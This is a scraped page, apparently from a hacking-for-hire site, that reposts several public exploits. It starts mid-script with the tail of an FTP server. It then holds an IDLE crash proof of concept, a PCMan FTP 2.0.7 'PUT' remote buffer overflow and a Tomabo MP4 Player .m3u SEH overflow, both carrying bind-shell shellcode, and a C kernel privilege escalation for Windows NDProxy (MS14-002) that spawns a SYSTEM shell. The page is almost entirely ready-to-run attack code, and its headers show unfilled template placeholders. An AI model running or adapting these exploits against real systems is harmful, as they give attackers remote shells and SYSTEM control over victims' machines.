th=FTPserverThread(self.sock.accept()) th.daemon=True th.start() def stop(self): self.sock.close() if __name__=='__main__': ftp=FTPserver() ftp.daemon=True ftp.start() print 'On', local_ip, ':', local_port raw_input('Enter to end...\n') ftp.stop()
HireHackking

Python IDLE 2.7.8 - Crash (PoC)

HACKER · %s · %s

#!/usr/bin/env python # Title : Python IDLE 2.7.8 - Crash Proof Of Concept # Website : http://www.python.org/idle/ # Tested : Windows 7 / Windows 8.1 # # # Author : Hadi Zomorodi Monavar # Email : zomorodihadi@gmail.com # # 1 . run python code : python poc.py # 2 . open r3z4.txt and copy content to clipboard # 3 . open "python 2.7.8 IDLE" # 4 . from Menu (edit --> find) # 5 . Paste ClipBoard on "find" # 6 . Enter # 7 . Crashed ;) crash = "\x41"*900000 #B0F file = open("r3z4.txt", "w") file.write(crash) file.close()
HireHackking

PCMan FTP Server 2.0.7 - 'PUT' Remote Buffer Overflow

HACKER · %s · %s

#!/usr/bin/python # title: PCMan FTP Server v2.0.7 Buffer Overflow - PUT Command # author: @shipcod3 (Jay Turla) # nc <host> 9988 # Tested on Windows XP Service Pack 3 - English # description: Buffer overflow is triggered upon sending long string using the command PUT to PCMAN FTP 2.07 import socket import sys # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -b '\x00\x0A\x0D' -t c shellcode = ( "\xdb\xd0\xbb\x36\xcc\x70\x15\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x56\x83\xc2\x04\x31\x5a\x14\x03\x5a\x22\x2e\x85\xe9\xa2\x27" "\x66\x12\x32\x58\xee\xf7\x03\x4a\x94\x7c\x31\x5a\xde\xd1\xb9" "\x11\xb2\xc1\x4a\x57\x1b\xe5\xfb\xd2\x7d\xc8\xfc\xd2\x41\x86" "\x3e\x74\x3e\xd5\x12\x56\x7f\x16\x67\x97\xb8\x4b\x87\xc5\x11" "\x07\x35\xfa\x16\x55\x85\xfb\xf8\xd1\xb5\x83\x7d\x25\x41\x3e" "\x7f\x76\xf9\x35\x37\x6e\x72\x11\xe8\x8f\x57\x41\xd4\xc6\xdc" "\xb2\xae\xd8\x34\x8b\x4f\xeb\x78\x40\x6e\xc3\x75\x98\xb6\xe4" "\x65\xef\xcc\x16\x18\xe8\x16\x64\xc6\x7d\x8b\xce\x8d\x26\x6f" "\xee\x42\xb0\xe4\xfc\x2f\xb6\xa3\xe0\xae\x1b\xd8\x1d\x3b\x9a" "\x0f\x94\x7f\xb9\x8b\xfc\x24\xa0\x8a\x58\x8b\xdd\xcd\x05\x74" "\x78\x85\xa4\x61\xfa\xc4\xa0\x46\x31\xf7\x30\xc0\x42\x84\x02" "\x4f\xf9\x02\x2f\x18\x27\xd4\x50\x33\x9f\x4a\xaf\xbb\xe0\x43" "\x74\xef\xb0\xfb\x5d\x8f\x5a\xfc\x62\x5a\xcc\xac\xcc\x34\xad" "\x1c\xad\xe4\x45\x77\x22\xdb\x76\x78\xe8\x6a\xb1\xb6\xc8\x3f" "\x56\xbb\xee\x98\xa2\x32\x08\x8c\xba\x12\x82\x38\x79\x41\x1b" "\xdf\x82\xa3\x37\x48\x15\xfb\x51\x4e\x1a\xfc\x77\xfd\xb7\x54" "\x10\x75\xd4\x60\x01\x8a\xf1\xc0\x48\xb3\x92\x9b\x24\x76\x02" "\x9b\x6c\xe0\xa7\x0e\xeb\xf0\xae\x32\xa4\xa7\xe7\x85\xbd\x2d" "\x1a\xbf\x17\x53\xe7\x59\x5f\xd7\x3c\x9a\x5e\xd6\xb1\xa6\x44" "\xc8\x0f\x26\xc1\xbc\xdf\x71\x9f\x6a\xa6\x2b\x51\xc4\x70\x87" "\x3b\x80\x05\xeb\xfb\xd6\x09\x26\x8a\x36\xbb\x9f\xcb\x49\x74" "\x48\xdc\x32\x68\xe8\x23\xe9\x28\x18\x6e\xb3\x19\xb1\x37\x26" "\x18\xdc\xc7\x9d\x5f\xd9\x4b\x17\x20\x1e\x53\x52\x25\x5a\xd3" "\x8f\x57\xf3\xb6\xaf\xc4\xf4\x92") buffer = "\x90" * 30 + shellcode #77c35459 : push esp # ret | {PAGE_EXECUTE_READ} [msvcrt.dll] evil = "A"*2008 + "\x59\x54\xC3\x77" + buffer + "C"*(888-len(buffer)) s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect((raw_input('Enter Host:'),21)) s.recv(1024) s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS anonymous\r\n') s.recv(1024) s.send('PUT ' + evil + '\r\n') s.recv(1024) s.send('QUIT\r\n') s.close
HireHackking

Tomabo MP4 Player 3.11.3 - '.m3u' Local Buffer Overflow (SEH)

HACKER · %s · %s

#!/usr/bin/python # Exploit Title: Tomabo MP4 Player 3.11.3 - (.m3u) SEH Buffer Overflow # Date: 03/08/2015 # Exploit Author: Saeid Atabaki # E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org # Linkedin: https://www.linkedin.com/in/saeidatabaki # Vendor Homepage: http://tomabo.com/mp4-player/index.html # Version: 3.11.3 # Tested on: Windows XP SP3 #---------------------------------------------------------------------# # Badchars: "\x00\x0a\x0d\x0c\x20\x09\x1a"' # # nc 192.168.11.136 8080 # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Documents and Settings\Administrator\Desktop> #---------------------------------------------------------------------# import sys, struct file="crash.m3u" # Windows bind shell port 8080, feel free to swap shellcode sc = "" sc += "\xdd\xc1\xd9\x74\x24\xf4\xb8\xd3\x4b\xb2\xa4\x5d\x31" sc += "\xc9\xb1\x53\x31\x45\x17\x83\xc5\x04\x03\x96\x58\x50" sc += "\x51\xe4\xb7\x16\x9a\x14\x48\x77\x12\xf1\x79\xb7\x40" sc += "\x72\x29\x07\x02\xd6\xc6\xec\x46\xc2\x5d\x80\x4e\xe5" sc += "\xd6\x2f\xa9\xc8\xe7\x1c\x89\x4b\x64\x5f\xde\xab\x55" sc += "\x90\x13\xaa\x92\xcd\xde\xfe\x4b\x99\x4d\xee\xf8\xd7" sc += "\x4d\x85\xb3\xf6\xd5\x7a\x03\xf8\xf4\x2d\x1f\xa3\xd6" sc += "\xcc\xcc\xdf\x5e\xd6\x11\xe5\x29\x6d\xe1\x91\xab\xa7" sc += "\x3b\x59\x07\x86\xf3\xa8\x59\xcf\x34\x53\x2c\x39\x47" sc += "\xee\x37\xfe\x35\x34\xbd\xe4\x9e\xbf\x65\xc0\x1f\x13" sc += "\xf3\x83\x2c\xd8\x77\xcb\x30\xdf\x54\x60\x4c\x54\x5b" sc += "\xa6\xc4\x2e\x78\x62\x8c\xf5\xe1\x33\x68\x5b\x1d\x23" sc += "\xd3\x04\xbb\x28\xfe\x51\xb6\x73\x97\x96\xfb\x8b\x67" sc += "\xb1\x8c\xf8\x55\x1e\x27\x96\xd5\xd7\xe1\x61\x19\xc2" sc += "\x56\xfd\xe4\xed\xa6\xd4\x22\xb9\xf6\x4e\x82\xc2\x9c" sc += "\x8e\x2b\x17\x08\x86\x8a\xc8\x2f\x6b\x6c\xb9\xef\xc3" sc += "\x05\xd3\xff\x3c\x35\xdc\xd5\x55\xde\x21\xd6\x46\x8f" sc += "\xaf\x30\x12\xbf\xf9\xeb\x8a\x7d\xde\x23\x2d\x7d\x34" sc += "\x1c\xd9\x36\x5e\x9b\xe6\xc6\x74\x8b\x70\x4d\x9b\x0f" sc += "\x61\x52\xb6\x27\xf6\xc5\x4c\xa6\xb5\x74\x50\xe3\x2d" sc += "\x14\xc3\x68\xad\x53\xf8\x26\xfa\x34\xce\x3e\x6e\xa9" sc += "\x69\xe9\x8c\x30\xef\xd2\x14\xef\xcc\xdd\x95\x62\x68" sc += "\xfa\x85\xba\x71\x46\xf1\x12\x24\x10\xaf\xd4\x9e\xd2" sc += "\x19\x8f\x4d\xbd\xcd\x56\xbe\x7e\x8b\x56\xeb\x08\x73" sc += "\xe6\x42\x4d\x8c\xc7\x02\x59\xf5\x35\xb3\xa6\x2c\xfe" sc += "\xc3\xec\x6c\x57\x4c\xa9\xe5\xe5\x11\x4a\xd0\x2a\x2c" sc += "\xc9\xd0\xd2\xcb\xd1\x91\xd7\x90\x55\x4a\xaa\x89\x33" sc += "\x6c\x19\xa9\x11" payload = "\x90" * 1028 + "\xeb\x18\x90\x90" + "\x69\x9e\x48\x00" + "\x90" * 20 + sc writeFile = open (file, "w") writeFile.write( payload ) writeFile.close()
HireHackking
/* ################################################################ # Exploit Title: Windows NDProxy Privilege Escalation (MS14-002) # Date: 2015-08-03 # Exploit Author: Tomislav Paskalev # Vulnerable Software: # Windows XP SP3 x86 # Windows XP SP2 x86-64 # Windows 2003 SP2 x86 # Windows 2003 SP2 x86-64 # Windows 2003 SP2 IA-64 # Supported vulnerable software: # Windows XP SP3 x86 # Windows 2003 SP2 x86 # Tested on: # Windows XP SP3 x86 EN # Windows 2003 SP2 x86 EN # CVE ID: 2013-5065 ################################################################ # Vulnerability description: # NDPROXY is a system-provided driver that interfaces WAN # miniport drivers, call managers, and miniport call managers # to the Telephony Application Programming Interfaces (TAPI) # services. # The vulnerability is caused when the NDProxy.sys kernel # component fails to properly validate input. # An attacker who successfully exploited this vulnerability # could run arbitrary code in kernel mode (i.e. with SYSTEM # privileges). ################################################################ # Exploit notes: # Privileged shell execution: # - the SYSTEM shell will spawn within the existing shell # (i.e. exploit usable via a remote shell) # Exploit compiling: # - # i586-mingw32msvc-gcc MS14-002.c -o MS14-002.exe # Exploit prerequisites: # - low privilege access to the target (remote shell or RDP) # - target not patched (KB2914368 not installed) # - service "Routing and Remote Access" running on the target # - "Power User" user group can start and stop services # - > sc query remoteaccess # - > sc start remoteaccess ################################################################ # Thanks to: # Andy (C PoC - Win XP SP3) # ryujin (Python PoC - Win XP SP3) ################################################################ # References: # http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5065 # https://technet.microsoft.com/en-us/library/security/ms14-002.aspx # https://penturalabs.wordpress.com/2013/12/11/ndproxy-privilege-escalation-cve-2013-5065/ # https://www.exploit-db.com/exploits/30014/ # https://msdn.microsoft.com/en-us/library/windows/desktop/ms681674%28v=vs.85%29.aspx # https://msdn.microsoft.com/en-us/library/windows/desktop/aa363858%28v=vs.85%29.aspx # https://msdn.microsoft.com/en-us/library/windows/desktop/ms681381%28v=vs.85%29.aspx # https://msdn.microsoft.com/en-us/library/windows/desktop/aa363216%28v=vs.85%29.aspx ################################################################ */ #include <windows.h> #include <stdio.h> #include <stdlib.h> typedef struct { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef DWORD NTSTATUS; NTSTATUS (WINAPI *_NtQuerySystemInformation) (SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); static VOID InitFirstPage (void) { PVOID BaseAddress; ULONG RegionSize; NTSTATUS ReturnCode; FARPROC NtAllocateVirtualMemory; NtAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "NtAllocateVirtualMemory"); fprintf (stderr, "[+] NtAllocateVirtualMemory@%p\n", NtAllocateVirtualMemory); RegionSize = 0xf000; BaseAddress = (PVOID) 0x00000001; ReturnCode = NtAllocateVirtualMemory (GetCurrentProcess (), &BaseAddress, 0, &RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (ReturnCode != 0) { fprintf (stderr, "[-] NtAllocateVirtualMemory() failed to map first page\n"); fprintf (stderr, " Error code: %#X\n", ReturnCode); fflush (stderr); ExitProcess (1); } fprintf (stderr, "[+] BaseAddress: %p, RegionSize: %#x\n", BaseAddress, RegionSize), fflush (stderr); FillMemory (BaseAddress, RegionSize, 0x41); return; } int exploit (unsigned char *shellcode) { DWORD writtenBytes; int returnValue; InitFirstPage (); unsigned char *shellcodeBuffer; shellcodeBuffer = (char *) malloc (400); memset (shellcodeBuffer, (int) "xCC", 400); memcpy (shellcodeBuffer, shellcode, 112); returnValue = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x00000001, shellcodeBuffer, 0x400, &writtenBytes); if (returnValue == 0) { printf ("[-] Attempt to map memory_write failed\n"); printf (" Error code: %d\n", GetLastError ()); exit(1); } HANDLE ndProxyDeviceHandle = CreateFileA ("\\\\.\\NDProxy", 0, 0, NULL, OPEN_EXISTING, 0, NULL); if (ndProxyDeviceHandle == INVALID_HANDLE_VALUE) { printf ("[-] Creating a device handle on NDProxy failed\n"); printf (" Error code: %d\n", GetLastError()); exit (0); } DWORD inputBuffer [0x15] = {0}; DWORD returnedBytes = 0; *(inputBuffer + 5) = 0x7030125; *(inputBuffer + 7) = 0x34; DeviceIoControl (ndProxyDeviceHandle, 0x8fff23cc, inputBuffer, 0x54, inputBuffer, 0x24, &returnedBytes, 0); CloseHandle (ndProxyDeviceHandle); system ("cmd.exe /T:C0 /K cd c:\\windows\\system32"); return 0; } int main (int argc, char **argv) { if (argc != 2) { printf ("[*] Usage: %s OS_TYPE\n", argv[0]); printf (" supported OS_TYPE:\n"); printf (" XP - Windows XP SP3 x86\n"); printf (" 2k3 - Windows 2003 SP2 x86\n"); printf ("[*] Note: the service \"Routing and Remote Access\"\n"); printf (" must be running on the target machine\n"); exit (0); } else { if ((strcmp (argv[1], "xp") == 0) || (strcmp (argv[1], "XP") == 0)) { unsigned char shellcodeXP[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90" "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B" "\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00" "\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3"; exploit (shellcodeXP); } else if ((strcmp (argv[1], "2k3") == 0) || (strcmp (argv[1], "2K3") == 0)) { unsigned char shellcode2k3[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x3C\x00\x00\x00\x90\x90\x90\x90" "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x38\x8B\xC8\x8B" "\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x83\xB8\x94\x00\x00\x00" "\x04\x75\xEC\x8B\x90\xD8\x00\x00\x00\x89\x91\xD8\x00\x00\x00\xC3"; exploit (shellcode2k3); } else { printf ("[-] Invalid argument\n"); printf (" Argument used: %s\n", argv[1]); exit(0); } } }